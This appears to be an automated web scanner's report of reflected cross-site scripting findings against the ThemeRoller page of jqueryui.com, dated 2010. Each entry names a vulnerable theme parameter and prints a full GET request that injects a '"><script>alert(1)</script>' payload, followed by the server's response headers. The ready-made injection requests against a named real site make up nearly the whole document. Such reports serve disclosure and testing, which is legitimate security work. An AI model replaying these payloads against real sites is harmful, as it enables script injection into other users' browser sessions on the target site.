HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f47"><script>alert(1)</script>86f6ab1337a was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c61"><script>alert(1)</script>2558bcf702b was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1ed"><script>alert(1)</script>af92b1064b8 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a53"><script>alert(1)</script>2590027d388 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e5e"><script>alert(1)</script>15d613d40d8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717a0"><script>alert(1)</script>8ae54f49d58 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34db"><script>alert(1)</script>974427909eb was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d610a"><script>alert(1)</script>664987fb5fe was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c1c"><script>alert(1)</script>8b71ac69cdd was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4924"><script>alert(1)</script>b7e5d296fe2 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb0c1"><script>alert(1)</script>2173eee1a85 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67ff"><script>alert(1)</script>d6da6a382c8 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:11:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f82b"><script>alert(1)</script>9800a832c8e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
